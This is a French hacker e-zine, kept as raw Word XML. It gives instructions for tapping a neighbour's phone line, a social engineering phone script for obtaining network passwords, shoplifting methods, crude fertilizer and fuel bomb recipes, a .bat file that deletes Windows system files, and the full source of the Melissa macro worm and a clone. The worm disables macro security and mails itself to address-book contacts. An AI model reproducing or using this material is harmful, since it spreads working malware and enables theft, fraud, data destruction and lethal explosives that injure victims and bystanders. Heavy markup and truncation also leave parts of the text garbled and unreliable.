Rockwell's AT%TCB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NC00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NC55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NC055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rac ATS31=128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T1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U75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NC99 puis ATZ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amp;D3 + DTR Low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R0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TS70=64 ou ATS70=192 </w:t>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color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">ATX2 ou AT*F ou AT%X2 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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08" w:leader="none"/>
        </w:tabs>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13 Le beige boxing, par Clad Strife</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Beige Boxing, consiste à pirater une ligne téléphonique en se branchant sur une ligne téléphonique qui ne nous appartient pas pour éviter de payer! Explications sur l'affaire pour ceux qui y pigent que dalle: Vous avez un téléphone, et une prise qui relie ce téléphone au mur de votre pièce. Regardez cette prise: elle est composée de 3 lamelles grises, c'est par là que va passer le courant et le signal. D'accord? Donc en démontant cette prise là, vous verrez apparaitre 2 fils, ces 2 fils là nous intéress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atériel à avoi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2 pinces crocodile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 l'étain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e quoi faire une soudur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 tournevis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 téléphone standard...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 un cutter.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il s'agit de trouver maintenant les fils qui partent d'une maison ou d'un immeuble, FAITES ATTENTION QUE CE NE SOIENT PAS DES FILS ELECTRIQUES. Pour repérer si tel est le cas regardez si les fils sont raccordés à des pylones en bois, ou partent dans le sol... Evitez de toucher aux fils souterrains, et cherchez plutôt une borne FT qui serait sur un pylone, sur le mur d'une maison, immeuble, etc.... Alors donc cherchez ces boitiers marqués FT ou tout simplement un fil noir assez gros descendant des pilones en bois, et défoncez les (les boitiers pas les pilones), juste pour les ouvrir. Faites ça de préférence le jour, vers les 6 ou 7 heures du mat en faisant un minimum de bruit. Bon assurez vous que personne ne vous a, ou n'a pu vous repérer et dénudez le fil noir à l'aide de vottre cutter. Ce fil noir fait 0,5cm de diamètre ou un peu plus, une fois dénudé vous rentrez chez vous pour souder vos pinces crocodiles aux files de la prise du téléphone, n'oubliez pas de replacer en partie le boitier pour que ça soit pas trop visible que vous avez défoncé la boite FT... Okay c'est fait? Bon Il n'y a plus qu'à attendre que la nuit se lève. Il devrait être entre 23h00 et 1h00 du mat quand vous irez retrouvez votre fil noir dénudé... En ayant pris soin de faire un minimum de bruit vous allez brancher vos pinces crocodiles sur les fils dépassant de la partie dénudée... Bon vous avez bien entendu une lampe de poche avec vous. Okay, vous n'avez plus qu'à faire différents branchements dans le cas où il n'y aurait pas de tonalité! Assurez vous de la qualité de vos branchements pour pas que tout décroche au dernier moment! de là appellez qui vous voulez: pas un pote qui vous reconnaitrait, plutôt les réseaux ou une pizzeria encore ouverte.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vitez de revenir sur le lieu du litige trop souvent: le mec dont vous avez détourné la ligne telephone finirait par s'en rendre compte. Cette technique marche en France.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.14 Cours de Social Engineering, par Clad Strife</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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ocial Engineering, ou encore: diffrénetes manières de compter sur les faiblesses humaines plutôt que les faiblesses informatiques. En un mot il s'agfit de fairee croire certaine chose à son correspondant dans le but évident de pouvoir agir en faisant des choses pas très légales. Avant d'appeler le mec à l'autre bout faut avoir des infos sur lui, allez sur le site du type regardez ce que vous pouvez trouver, renseignez vous...</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xemple de discussion qui doivent avoir lieu au téléphone, pour être convaincant au maximum:, dans ce cas présent vous voulez avoir le password d'un poste relié à l'internet pour pénétrer le réseau intranet.</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t;vous&gt;  Bonjour Mr Gauthier, je suis chargé de m'assurer du bon fonctionnement de votre réseau.</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t;Gauthier&gt;Bonjour, vous êtes??</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t;vous&gt; Mr Philibert, Jean-Richard Philibert. J'aurais besoin du password pour pouvoir faire mon travail, et j'ai un temps imparti comme stipulé dans mon contrat.</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t;Gauthier&gt;Vous pouvez me répéter votre nom s'il vous plait?</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t;vous&gt; Philibert, ça s'écrit P-H-I-L-I-B-E-R-T</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t;Gauthier&gt; Mmmh..; d'accord appelez le 777-4321et dites leur que vous venez de ma part. Dites leur ce que vous souhaitez ils sont là pour ça.</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t;vous&gt; Merci...</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t;Gauthier&gt; Au revoir</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t;vous&gt; Au revoir</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lic*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t;vous&gt;connard!</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ref, en général on improvise. Le gars au lieu de se montrer docile, pourrait vous dire:</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Eh bien passez nous voir!</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On a votre numéro, on vous rappellera</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Attendez je vérifie votre identité</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Nous n'avons pas de réseau conecté à l'internet!</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Qu'est-ce que vous racontez???</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J'appelle la police criss!!!</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708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.15 Voler dans les grandes surfaces, par Clad Strife</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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omment se préparer: évitez de prendre un sac à dos pour stocker ce que vous prendrez, c'est bien trop vite grillé, en revanche habillez vous comme ceci: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tête nue (pas crâne rasé)</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des vêtements: pas d'la marqu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pull long descendant en dessous du cul, de couleur foncée pour passer inaperçu.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pantalon large, avec des poches, une ceinture autour du pantalon: une vieille ceinture, pantalon non voyant bien sur.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une paire de ciseaux de cuisine, que la ceinture tiendra et que le pull cachera.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un morceau de charbon (pour chper les chaussures</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du liquid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des chaussures lavées, belles, et propres... Il en est de même pour les vêtements qui doivent être beaux et repassés. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Phase 1: Voler des fringues. Aller dans votre grande surface et assurez vous de la présence d'une cabine d'essayage. Ne prenez qu'un seul fringue (T-Shirt ou pantalon, etc...). Okay vous voilà avec votre T-Shirt: évitez de prendre un Nike, un t-Shirt beau mais banal qui se remarque pas. Allez dans la cabine d'essayage: froissez le nouveau t-Shirt, mettez sur le ceintre l'ancien proprement repassé au préalable, et remettez tout à sa place. Achetez quelque chose pour pas avoir l'air louche: genre boite de tic-tac et passez par la caisse! Attention: utilisez la paire de ciseeaux pour retirer les étiquettes, vignettes, dispositif de détection. Maintenant une autre méthode: celle du mec qui veut un pur truc de T-Shirt qui déchire: prenez 2 T-Shirts à essayer, aller dans la cabine, mettez le T-Shirt de marque sous l'ancien T-Shirt (celui que vous aviez pour venir), remettez votre pull par dessus, en prenant soin de retirer ce qui montre que le T-Shirt est neuf. Okay, laissez un cintre dans la cabine et remettez le second T-Shirt à sa place: genre vous arrivez avec quelquechose sur les bras vous remettez quelque chose à sa place. Attention aux caméras de surveillance: ayez l'air cool et relax. Faites la même chose pour les pantalons que pour voler un T-Shirt pas d'marque. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
          <w:tab w:val="left" w:pos="708"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Phase2: Voler des chaussures. Allez dans les rayons pour chaussures pas dans les vieilles boutiques pour Mémé et Pépé comme Till et autres. Regardez où se trouvent les caméras, si il y en a pas, le coup est moins risqué mais bon: ne tentons pas le diable. Prenez une paire de chaussures, comme si vous alliez l'acheter et baladez vous style: j'vais acheter du vin pour ma reum. Allez dans un coin tranquille (cabine d'essayage avec d'autres fringues sur les bras), derrière les rayons etc...Mettez au pieds votre nouvelle paire de chaussures, cool elles sont belles: on sort les ciseaux et on nique ce qui peut nous faire repérer. Okay, on sort le morceau de charbon et on les salit bien, pas trop... pliez les tordez les, et ayez l'air cool avec. Vos autres chaussures, les anciennes, vous les remettez en rayon... Ni vu ni connu... Achetez des tic-tac pour la forme. </w:t>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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Astuce: Pour pas paraitre du tout suspect achetez de la viande pour le chien, du vin pour vous saouler, des légumes pour jeter sur les voitures... et dites que vous faites les courses pour vos parents. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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6 Faire des bombes, par Clad Strife</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On va pas répéter les excellentes recettes pour faire des bombes du premier e-mag des QHA, on va expliquer comment en faire simplement, mais </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">méfiez vous: en lisant ceci personne ne vous oblige à le faire! A la télé on vous dit d'aller manger Mac DO et vous le faites pour autant? Non, je crois pas: alors inutile d'appliquer ce qui va suivre: c'est formellement interdit!! Pour faire votre petit mélange vous aurez besoin d'angrais, et de charbon. Vous prenez l'engrais et le charbon en proportions égales, vous réduisez le tout en poudre, commencez vos expériences avec d'infimes quantités... Essayez différents dosages: le résultat peut en être meilleur. Rappelez vous que 100gr. de ce mélange vous arrache la main, 200gr. et vous êtes mort. Si vous comprimez ce mélange dans une bouteille, la bouteille explose, dans ce cas c'est des éclats de verres sur plus de 50 mètres. Conseil pratique: mettez un fond d'essence ou de produit désodorisant au fond de la bouteille pour en imprégner le mélange: effet... mortel. </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utre bombe à fabriquer: Un peu d'essence, des allumes-barbecues, de l'alcool à 90°, des désodorisants, un peu de dihydrogène si vous en avez. Tout en grosse quantité, vous puvez rajouter d'autre sortes de prduits inflammables. Résultat? Vous êtes mort et vous faites péter votre immeuble si vous faites une grosse bombe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="70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708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.17 Les fichiers .bat, par Clad Strife</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a création de fichiers .bat est simple: il suffit de s'y connaitre un peu en MS-DOS, et savoir taper sur son clavier. D'abord quelques commandes de bases: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off : désactive l'affichage de ce qui se pass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ir C:\WINDOWS : affiche le contenu de C:\WINDOWS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el C:\WINDOWS\*.exe : efface tous les fichiers .exe du C:\WINDOWS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 saute une lign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J'écris bien hein? : affiche ce qui est écrit après [echo]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ls : efface l'écran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pause : demande d'appuyez sur une touche pour continuer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WINDOWS\telnet.exe : éxécute telnet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onc voici le genre de fichiers .bat extrèmement dangereux que vous pouvez faire: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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cho off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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cho this programm is created by XXX all rights reserved</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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ause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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el C:\WINDOWS\*.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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ir C:\WINDOWS\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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cho t'es mort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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On peut aussi créer des menus d'options: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="24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echo off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menu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cls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cho.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cho Menu d'options :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cho -----------------------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cho 1. Editer autoexec.bat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cho 2. Editer config.sys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cho.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cho Q. Quitter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cho.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choice /c:12Q /t:Q,60 /n Votre choix ?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errorlevel 255 goto erreur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errorlevel 3 goto Quitter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errorlevel 2 goto EditConf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errorlevel 1 goto EditAuto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errorlevel 0 goto erreur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goto fin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rreur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cho Il y a eu une erreur.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goto fin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Quitter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goto fin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ditConf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dit c:\config.sys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goto menu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ditAuto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dit c:\autoexec.bat </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708" w:leader="none"/>
        </w:tabs>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goto menu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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>:fin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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Si vous n'avez pas compris le passage sur la commande choice et errorlevel, voilà de quoi vous aider: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Aide sur CHOICE :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hoice [/c:ON] [/t:X,nn] [/n] [Invit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ON Choix de lettres utilisables (ici O et N) (ON par défaut)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t:X,nn Choisira automatiquement option X après nn secondes. X doit faire parti de la liste /c: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n Interdit le respect de la cass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Invite Texte d'invite qui apparaît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rrorlevel correspond au choix de l'utilisateur. c'est comme la variable de réponse en Q-Basic.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Paramètre de la ligne de commande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off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ls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Le prog est %0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Bonjour %1,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A plus, %2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nregistrer sous "c:\test.bat" et taper sous dos :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test.bat "votrenom" "unAutrenom"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X correspond au Xième groupe de caractères sur la ligne de commande pour X={0;9}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Très pratique pour faire un prog d'installation : </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708"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xcopy a:\*.* %1:\%2 </w:t>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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ici, %1 est la lettre de lecteur et %2 le dossier.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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 w:leader="none"/>
        </w:tabs>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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.18 Code Source Melissa, par Clad Strife</w:t>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Héhé... Le moment le plus chaud de cet E-zine. Sachez que si vous avez le code source de Melissa à votre disposition c'est uniquement parce que vous voulez en créer des anti-virus, ou savoir vous en protéger. Eh oui. Si vous n'êtes pas d'accord avec le fait que vous ne devez l'étudier ici qu'à titre purement éducatif ou non nuisible ou bénéfique alors vous appuyez sur la petite croix en haut à droite de votre navigateur (Vous la voyez?). Melissa en effet à la particularité toute spéciale de s'envoyer sous format .doc à la victime et de l'infecter de telle sorte à ce que la victime ayant ouvert le document réenvoie inconsciemment, à 50 destinataires, le même mail que reçu avec Melissa en attachemen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on, je vous déconseille de déconner avec ça et de n'utiliser le code qui va suivre que dans un but personnel ou impersonnel mais profitable aux autres personnes. Sachez que Melissa ne marche qu'avec les utilisateurs de Microsot Outlook.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Private Sub Document_Open()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On Error Resume Next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System.PrivateProfileString("",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HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",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Level") &lt;&gt; "" Then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CommandBars("Macro").Controls("Security...").Enabled = Fals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System.PrivateProfileString("",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HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",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Level") = 1&amp;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ls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CommandBars("Tools").Controls("Macro").Enabled = Fals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Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 -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1): Options.SaveNormalPrompt = (1 - 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nd If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Dim UngaDasOutlook, DasMapiName, BreakUmOffASlic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Set UngaDasOutlook = CreateObject("Outlook.Application")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Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")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System.PrivateProfileString("",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HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &lt;&gt; "... by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Kwyjibo" Then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UngaDasOutlook = "Outlook" Then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DasMapiName.Logon "profile", "password"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For y = 1 To DasMapiName.AddressLists.Count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Set AddyBook = DasMapiName.AddressLists(y)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x = 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Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)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For oo = 1 To AddyBook.AddressEntries.Count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Peep = AddyBook.AddressEntries(x)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BreakUmOffASlice.Recipients.Add Peep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x = x + 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x &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then oo = AddyBook.AddressEntries.Count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Next oo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BreakUmOffASlice.Subject = "Important Message From " &amp;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Application.UserNam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BreakUmOffASlice.Body = "Here is that document you asked for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 don't show anyone else ;-)"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BreakUmOffASlice.Attachments.Add ActiveDocument.FullNam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BreakUmOffASlice.Send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Peep = ""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Next y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DasMapiName.Logoff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nd If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System.PrivateProfileString("",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HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by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Kwyjibo"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nd If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Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(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Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(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NTCL = NTI1.CodeModule.CountOfLines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ADCL = ADI1.CodeModule.CountOfLines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BGN = 2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ADI1.Name &lt;&gt; "Melissa" Then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ADCL &gt; 0 Then ADI1.CodeModule.DeleteLines 1, ADCL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Set ToInfect = ADI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ADI1.Name = "Melissa"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DoAD = Tru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nd If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NTI1.Name &lt;&gt; "Melissa" Then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NTCL &gt; 0 Then NTI1.CodeModule.DeleteLines 1, NTCL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Set ToInfect = NTI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NTI1.Name = "Melissa"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DoNT = Tru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nd If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DoNT &lt;&gt; True And DoAD &lt;&gt; True Then GoTo CYA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DoNT = True Then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Do While ADI1.CodeModule.Lines(1, 1) = ""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ADI1.CodeModule.DeleteLines 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Loop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ToInfect.CodeModule.AddFromString ("Private Sub Document_Clos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Do While ADI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""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ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 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BGN = BGN + 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Loop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nd If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DoAD = True Then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Do While NTI1.CodeModule.Lines(1, 1) = ""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NTI1.CodeModule.DeleteLines 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Loop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ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")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Do While NTI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""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ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 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BGN = BGN + 1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Loop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nd If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CYA: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NTCL &lt;&gt; 0 And ADCL = 0 And (InStr(1, ActiveDocument.Nam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Document") = False) Then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ActiveDocument.SaveAs FileName:=ActiveDocument.FullNam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lseIf (InStr(1, ActiveDocument.Name, "Document") &lt;&gt; False) Then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ActiveDocument.Saved = Tru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End If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WORD/Melissa written by Kwyjibo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Works in both Word 2000 and Word 97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Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decid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Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!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If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,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plus triple-word-score, plus fifty points for using all my letters. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Game's over. I'm outta her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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">End Sub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FF"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Attention: un autre source code existe pour le même virus. Vous n'avez qu'à comparer. Si j'étais vous je choisirais le premier plutôt que le second mais les deux m'ont l'air valables et efficaces.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Private Sub AutoOpen()</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On Error Resume Next</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p$ = "clon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If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") &lt;&gt; "" Then</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CommandBars("Macro").Controls("Security...").Enabled = Fals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System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&amp;</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Els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p$ = "clon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CommandBars("Tools").Controls("Macro").Enabled = Fals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Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 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End If</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Dim UngaDasOutlook, DasMapiName, BreakUmOffASlic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Set UngaDasOutlook = CreateObject("Outlook.Application")</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Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")</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If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &lt;&gt; "... by Kwyjibo" Then</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If UngaDasOutlook = "Outlook" Then</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DasMapiName.Logon "profile", "password"</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For y = 1 To DasMapiName.AddressLists.Count</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Set AddyBook = DasMapiName.AddressLists(y)</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x = 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Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)</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For oo = 1 To AddyBook.AddressEntries.Count</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Peep = AddyBook.AddressEntries(x)</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BreakUmOffASlice.Recipients.Add Peep</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x = x + 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 xml:space="preserve">If x &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Then oo = AddyBook.AddressEntries.Count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Next oo</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BreakUmOffASlice.Subject = "Âàæíîå ñîîáùåíèå îò " &amp; Application.UserNam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BreakUmOffASlice.Body = "Ïîñûëàþ òåáå òî, ÷òî òû ïðîñèë... Ñïåöèàëüíî äëÿ òåáÿ ! ;-)"</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BreakUmOffASlice.Attachments.Add ActiveDocument.FullNam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BreakUmOffASlice.Send</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Peep = ""</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Next y</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DasMapiName.Logoff</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End If</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p$ = "clon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System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"</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End If</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Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(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Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(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NTCL = NTI1.CodeModule.CountOfLines</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ADCL = ADI1.CodeModule.CountOfLines</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BGN = 2</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If ADI1.Name &lt;&gt; "Melissa" Then</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If ADCL &gt; 0 Then _</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ADI1.CodeModule.DeleteLines 1, ADCL</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Set ToInfect = ADI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ADI1.Name = "Melissa"</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DoAD = Tru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End If</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If NTI1.Name &lt;&gt; "Melissa" Then</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If NTCL &gt; 0 Then _</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NTI1.CodeModule.DeleteLines 1, NTCL</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Set ToInfect = NTI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NTI1.Name = "Melissa"</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DoNT = Tru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End If</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If DoNT &lt;&gt; True And DoAD &lt;&gt; True Then GoTo CYA</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If DoNT = True Then</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Do While ADI1.CodeModule.Lines(1, 1) = ""</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ADI1.CodeModule.DeleteLines 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Loop</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ToInfect.CodeModule.AddFromString ("Private Sub Document_Clos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Do While ADI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""</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ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 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BGN = BGN + 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Loop</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End If</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p$ = "clon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If DoAD = True Then</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Do While NTI1.CodeModule.Lines(1, 1) = ""</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NTI1.CodeModule.DeleteLines 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Loop</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ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")</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Do While NTI1.CodeModule.Lines(BGN, 1) &lt;&gt; ""</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ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 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BGN = BGN + 1</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Loop</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End If</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CYA:</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If NTCL &lt;&gt; 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then</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ActiveDocument.SaveAs FileName:=ActiveDocument.FullNam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ElseIf (InStr(1, ActiveDocument.Name, "Document") &lt;&gt; False) Then</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ActiveDocument.Saved = True: End If</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WORD/Melissa written by Kwyjibo</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Clone written by Duke/SMF</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Works in both Word 2000 and Word 97</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Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decid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Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age!</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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
